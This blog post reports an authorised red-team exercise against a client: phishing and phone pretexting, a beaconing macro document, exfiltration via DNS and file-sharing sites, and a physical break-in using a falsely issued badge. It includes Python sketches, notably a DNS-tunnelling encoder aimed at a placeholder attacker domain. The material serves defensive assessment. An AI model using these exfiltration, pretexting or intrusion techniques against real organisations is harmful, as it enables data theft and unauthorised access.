
So how did the team get on in our War Game exercise? 

In order to complete the War Game exercise (the setup for which can be found in part 1 and part 2 of this series), our Security Advisory Services team determined that the following attack scenarios would need to be simulated:

The plan

  • A broad target phishing exercise
  • Malicious attachment campaign
  • Phone phishing campaign
  • Data exfiltration
  • Internal scenarios (limited duration access to network by external actor/malicious insider)
  • Social engineering assessment

To execute the phishing elements of the exercise, the team performed three specific campaigns:

  • Campaign 1: An email-based attack, posing as a client employee directing users to a news site discussing a recent client announcement
  • Campaign 2: An email-based attack, posing as a client employee and containing a Word document
  • Campaign 3: A phone-based attack, posing as a client employee seeking to ‘elicit’ information

Execution

Campaign 1

The team sent emails from a spoofed internal address to approximately 500 employees, which directed them to a news site discussing a recent announcement regarding a contract (intriguing!).

What made this campaign interesting was that the team did not include a direct link to the website. Instead, the email contained a supposed exchange between two fictional employees, Graham and Catherine (rather more convincing than Jane and John Doe), discussing the website, with the URL included in the email subject prefixed with “Fwd: ”. The website did not require authentication; its purpose was to simulate a ‘watering hole’ style attack, in which the site could have hosted exploits and malware triggered by visits from the client’s employees.

Note: The intention of this campaign was to mimic an attack that had been successful previously. In the earlier exercise, the team had exploited a weakness in the configuration of the filtering proxy to effectively re-sign otherwise self-signed certificates with the client’s internal CA. This proved to no longer be possible (albeit due to manual filtering by the client), so a real wildcard certificate was acquired instead. The campaign was spotted by the client, as the previous misconfiguration of the SSL middlebox had been fixed; however, the client agreed to whitelist the new site so that a representative sample of users could be collected.

As a result, the team recorded connections to the website from about half of the targets, as well as 75 email responses.

Campaign 2

The second email campaign was sent in similar fashion to another set of 500 users. The premise was an email with a Microsoft Word document attached, which contained a malicious macro (deadly alliteration there). The macro called back to the team’s staging box to report that the file had been run, but did not compromise the system; that extra functionality would have been trivial to add.
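The staging-side half of this beaconing can be sketched as a small HTTP listener that records which recipients ran the macro. This is a hypothetical reconstruction rather than the team's actual tooling: the `/beacon` endpoint and the per-user `id` token are assumptions for illustration.

```python
# Hypothetical sketch of a staging-side beacon listener; "/beacon" and
# the per-user "id" token are assumptions, not details from the exercise.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

seen = set()  # unique tokens, i.e. users who have executed the macro

class BeaconHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        token = query.get("id", ["unknown"])[0]
        seen.add(token)          # record the callback, nothing more
        self.send_response(204)  # empty reply: no payload is delivered
        self.end_headers()

    def log_message(self, *args):  # keep the console quiet
        pass

# Usage: HTTPServer(("0.0.0.0", 8080), BeaconHandler).serve_forever()
```

Because the set keys on the token, repeat executions by the same user are counted once, which is what makes the 20% figure below meaningful as a count of unique users rather than of clicks.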

First, a fully working proof-of-concept implant was created. This was sent to a pre-agreed employee, the user assigned to the internal phase of the test, who then executed the payload-enabling macros. The first attempt failed with an authentication problem at the proxy. The second payload managed to authenticate to the proxy and performed two of the three actions required to gain a foothold on the system; however, the team was unable to get an interactive shell back to the C&C server. The reason for this failure remains unknown; the client should investigate which of the controls in place prevented the attack.

The second stage was to send a benign Word document with the macro attached, to collect statistics on which users would open the document and run the macro.

In all, approximately 20% of recipients ran the macro, meaning an attacker would have had a substantial number of implants deployed on the network. This is a serious failing and could have led to a complete compromise of the internal network.

In both of these email-delivered attacks, the team included dummy command and control components which, if accessed, could in principle have been leveraged to gain remote access to the users’ systems. The team did not follow up with this final action in any instance, but in both campaigns it would clearly have been possible.

Campaign 3

In addition, the team performed a short phone-based campaign. For this, a list of 500 employee names and their corresponding extensions was supplied by the client and split by the team across the following scenarios:

  • Direct ask for credentials, pretending to be part of an internal team working on the new integration project playing off the back of the recent news
  • Direct ask for credentials. Same as above, but opening by presenting incorrect information for the target to correct, rather than simply asking
  • Website direction, pretending to be a member of the Human Resources team wanting to collect data through a beta system for a ‘safety at work’ programme. The website asked for credentials

The stats for this were as follows:

  • Phone numbers called: 20
  • Phones answered: 5%
  • Direct password request: User ID given 1% (password never given)
  • Link followed: 2.5%; details entered: 1%

From an external point of view, this was the phishing that caused the most stir. After about an hour, the people being called seemed to know what was going on, and were much more apprehensive. The team did find out that the client intranet held a code that could be used to authenticate colleagues. Once the team realised this existed, they immediately started asking for it, to see if anyone would hand it over.

There appeared to be two types of users: those who did not know what the team was talking about (and so would not hand the code over), and those who knew what it was and would not hand it over because they knew they were not supposed to. During the campaign, the team enticed a number of users into an email exchange, and from there got them to follow links.

There were also a number of users who said that they were reporting the call immediately. The team tried to turn this around, saying this was part of a phishing awareness campaign, and that they had done the right thing but ‘could they visit this site and register that they had passed the test’. Nobody fell for this extension (well done!).

Exfiltration

In order to identify whether adequate security controls were in place in terms of restricting the egress of data from the client networks, the team identified and evaluated the efficacy of several types of data exfiltration.

Whilst in the previous assessment, DNS tunnelling was found to be an effective method of surreptitious exfiltration, some steps had been taken to reduce the feasibility of this avenue. External DNS systems were not accessible directly, but instead were queried by perimeter DNS servers within the client network. By repeatedly querying the DNS entries for unique subdomains of an attacker-controlled domain, some data could still be exfiltrated through these DNS servers to external name servers, although this approach is not particularly efficient or reliable.
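The encoding step behind this technique can be sketched as follows. This is an illustrative reconstruction, not the team's actual tooling; it assumes data is hex-encoded into labels of an attacker-controlled domain (`attacker.example` is a placeholder), so that each recursive lookup forwarded by the internal DNS servers leaks one chunk to the attacker's authoritative name server.

```python
# Illustrative reconstruction; "attacker.example" is a placeholder for
# an attacker-controlled domain whose authoritative server logs queries.
MAX_LABEL = 63  # DNS limits each label to 63 octets (RFC 1035)

def encode_queries(data: bytes, domain: str = "attacker.example"):
    """Hex-encode data and split it into one query name per chunk."""
    hexed = data.hex()
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # A sequence-number label keeps every name unique (so caching never
    # swallows a query) and lets the receiver reassemble in order.
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]

def decode_queries(names):
    """Reassemble the original bytes from the logged query names."""
    ordered = sorted(names, key=lambda name: int(name.split(".")[0]))
    return bytes.fromhex("".join(name.split(".")[1] for name in ordered))
```

Each generated name would then simply be resolved (for example with `socket.gethostbyname`), which is why the approach works even when only the perimeter DNS servers can reach the Internet; it is also why it is slow, since every 63-character label carries barely 31 bytes of payload per round trip.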

For a malicious insider, it would have been necessary to download, install and run various tools on the attacking client laptop/desktop, and potentially to develop purpose-built tools, which would have required a significant level of technical expertise.

The team decided that transmitting data via HTTP or HTTPS would be simpler and a more likely scenario. The previous assessment showed that dynamic DNS providers could be used to reach attacker-controlled systems through the client’s proxies, but since then the common examples (DynDNS, No-IP) had been blocked. However, other dynamic DNS providers (especially paid ones) were found not to be blocked, nor were they reactively blocked after a day or two of use. These could again be used to exfiltrate data.

Instead of setting up their own server as an exfiltration target, the team focused on public file-sharing sites. A number of sites were found not to be blocked and could be used to exfiltrate data. The team generated large quantities of false records as test data, made to appear to contain credit card numbers (with valid Luhn check digits), dates, names, sort codes and bank account numbers. These records were then exfiltrated in a series of activities of escalating brazenness. On the final day of the test, large record documents were uploaded in plain text to file-sharing sites and paste sites (for example, Pastebin) with no indication that they were detected. In the course of the assessment, the only detected instance was when the team attempted to exfiltrate a plain-text CSV via email, which was blocked.
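Generating such plausible-but-false card numbers is straightforward. The sketch below is a minimal illustration of the Luhn check-digit calculation, not the team's actual generator (the field layout of their test records is not described here).

```python
# Minimal sketch of a fake-record generator; illustration only, not the
# team's actual tooling.
import random

def luhn_check_digit(partial: str) -> str:
    """Check digit that makes `partial + digit` pass the Luhn test."""
    total = 0
    # Right to left over the partial number: the digit next to the
    # future check digit is doubled, then every second digit after it.
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)

def fake_card_number(prefix: str = "4", length: int = 16) -> str:
    """Random digits under a given prefix, plus a valid check digit."""
    body = prefix + "".join(random.choice("0123456789")
                            for _ in range(length - len(prefix) - 1))
    return body + luhn_check_digit(body)

def luhn_valid(number: str) -> bool:
    return luhn_check_digit(number[:-1]) == number[-1]
```

Valid check digits matter here because DLP tooling commonly uses the Luhn test to distinguish real card numbers from random sixteen-digit strings; data that fails the check would not exercise those controls.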

In order to identify whether the perimeter proxy could be bypassed, the team sent a number of packets across the network addressed to an external server. The aim was to identify any unusual traffic types which might be permitted to travel outside of the network perimeter. Packets of every IPv4 protocol number (0 to 255), every ICMP type and code (0 to 255 each), all UDP ports, and TCP SYN packets on all ports were sent. There was no indication that any of these packets reached the external server, which likely means the network did not allow traffic to “leak” onto the Internet without first passing through the perimeter proxy and/or firewall.
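The protocol sweep can be illustrated by hand-building IPv4 headers that carry arbitrary protocol numbers. The sketch below is an illustration under stated assumptions (placeholder addresses, default field values), not the team's tooling; actually transmitting such headers would require a raw socket with `IP_HDRINCL` set, and root privileges.

```python
# Illustration only: builds the headers for an IPv4 protocol sweep; the
# addresses and field values are placeholders, not the client's.
import socket
import struct

def ip_checksum(header: bytes) -> int:
    """Ones'-complement sum of 16-bit words, as used by IPv4."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_ipv4_header(src: str, dst: str, proto: int,
                      payload_len: int = 0) -> bytes:
    """Minimal 20-byte IPv4 header carrying an arbitrary protocol
    number (0-255), one per packet in the sweep."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5, 0,      # version/IHL, TOS
                      20 + payload_len,     # total length
                      0, 0x4000,            # ID, flags (DF)
                      64, proto, 0,         # TTL, protocol, checksum=0
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = ip_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]

# The sweep would iterate proto over range(256) and hand each header,
# plus any payload, to a raw socket on the sending host.
```

Listening on the external server for any of these 256 protocol numbers (plus the ICMP, UDP and TCP variations) is what distinguishes a genuinely proxied-only egress path from a firewall that merely blocks the well-known ports.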

Since multiple avenues exist for exfiltration, and some of these avenues were shown to require little technical skill and no special tools, it would not be particularly difficult for a malicious staff member on a standard client laptop (as provided to the team) to collect, combine (for example, ZIP), and exfiltrate significant amounts of sensitive data over a short period of time, without detection. This threat model could be extended to an unauthenticated malicious insider (for example, someone trespassing in the building), in which phishing is used to first gain another user’s Active Directory credentials to be used on the proxy.

The team carried out activities to simulate both threat actors, such as using non-client laptops to access network services (for example, scanning for vulnerable services, or attempting to access shares present on the NAS).

As a result, it became apparent that such activities were rapidly detected by the Blue Team (the only time they scored points); however, low-noise attacks went largely undetected.

The team had greater success when acting as a malicious insider. It was a simple task to elevate privileges to those of a local administrator and use the machine as a pivot point (for example, to simulate a fully compromised remotely accessible system). It took several days for the fully weaponised system’s activities to be discovered, by which time the team had been able to gain remote code execution on a critical server within the client’s network.

Additionally, a sample of the servers comprising the critical systems was examined for common vulnerabilities. In almost all instances, missing patches were identified that could result in a denial of service or full system compromise. Furthermore, insecurely installed software was identified that could also lead to the compromise of critical systems.

Social engineering

In order to carry out an effective assessment of the two sites operated by the client as part of the War Game exercise, the team attempted to answer the following questions:

  • Could the team gain unauthorised access to either site?
  • Could the team leverage attacks from one site to another?

After testing, the team confirmed that both sites could be accessed without authentication, and that trust levels between the sites actually helped attackers gain access.

Below is a diarised (digitally, of course) version of the attack that took place over two days after in-depth reconnaissance:

  • The team arrived at Site A at 9 am and approached reception staff and asked for a “new starter form”. This was provided by reception staff with no questions or verification. The team left the building, filled out the form and proceeded to the rear of the building.
  • At the back of the building, the loading bay is in constant use and is more often open than closed. The team entered through the loading bay and thereby into the building. Upon first contact, the team asked to be directed to the ID card production office, was shown to the correct room by security staff, and was informed that someone would be there soon. The team was left alone in the card production room for approximately five minutes with full access to cards and lanyards. When the security staff appeared, the team produced the new starter form and offered ID, but this was turned down as apparently the form was enough. Security staff were concerned that the form was only for one week, as this is below the minimum threshold; however, the team convinced them that the pass would actually need frequent renewal over six months. Security staff then offered to make a badge valid for six months, including access to Site B. No verification was required, and the team left with a valid photo ID badge that worked across Site A and Site B. Had the team requested it, a pass would have been validated for any site.
  • The team was then able to access all areas of Site A except the data centre floors. These might have been accessible with tailgating techniques, had there been more footfall during the assessment window.
  • As well as the above, the team was able to freely move around the building and at one point even joined in a large IT security meeting, without challenge. In addition to this, the team was informed that access to floor four was restricted, but simple tailgating techniques gave the team access to the executive areas on that floor.
  • The team turned up at the Site B perimeter entrance and used the buzzer/intercom to contact security. No words were exchanged to verify the team member or the reason for the visit. Security staff remotely opened the gate and the team was allowed onto the site. The team then used the badge from the Site A compromise to open the front reception entrance. Upon entry, security did not ask for ID or request that the visitor book be signed.
  • The team told the security guard that they were meeting people but gave no details as to who. The team was then allowed to sit in the canteen area on the ground floor.
  • During this time, the team was able to enter two separate rooms on the ground floor; one appeared to be a generic build room containing computer systems and infrastructure devices, the other a security guard room whose door was wedged open. The build room door had access control, but the badge obtained at Site A worked on it.
  • Despite security being suspicious, they did not request ID or attempt to verify the reason for the visit with other staff. After some time, the lone security staff member walked outside the building, leaving the team alone inside. The team then used their Site A pass on the doors leading to the data floors. Once inside, several entrances were discovered; one used a badge/code mantrap, which appeared to be well secured, whilst another door was protected only by passive RFID locks (albeit of a type not previously seen elsewhere on the customer’s site). However, these were installed incorrectly and could easily have been bypassed, had the team been authorised to do so (thereby allowing the team onto the data floor). The team then proceeded to the upper floor, which was mostly empty with the lights off; after some time, the team located a small data rack containing an access switch, into which network-compromising devices could have been inserted.
  • Having no authorisation to bypass the passive RFID locks on the data floor entrances by means of a physical attack (and wanting to avoid attracting attention), the team decided that no further actions could be taken within the site to prove further compromise, and handed themselves in to security. On doing so, the security staff again failed to verify any of the staff listed on the letter of authority, or to use internal phone systems to contact them; instead they used the mobile numbers provided (which could have been fake, had this been a more sophisticated attack group).

Conclusion

The team believes that the likelihood of a successful Internet-delivered attack, whether by a malicious insider or an external actor, is high, given the systemic failures identified in these scenarios. It should, however, be noted that the attacker would have to employ extremely stealthy techniques to avoid detection by the client team, and would require fairly extensive knowledge of client systems and software deployments.

Similarly, the team felt that by leveraging multiple failures across both sites, unrestricted and apparently authorised access to any area of any client site would be possible. Had this been a more aggressive attack, there is no doubt that the data racks and computer systems held within Site B would have been fully compromised.

The final part of this series deals with the post-War Game wash-up and touches on some of the recommendations the team made to the client, both for end users and, perhaps more importantly, for the blue team who had been trying to stop us.

 



Authors

Tim (Wadhwa-)Brown

Security Research Lead

CX Technology & Transformation Group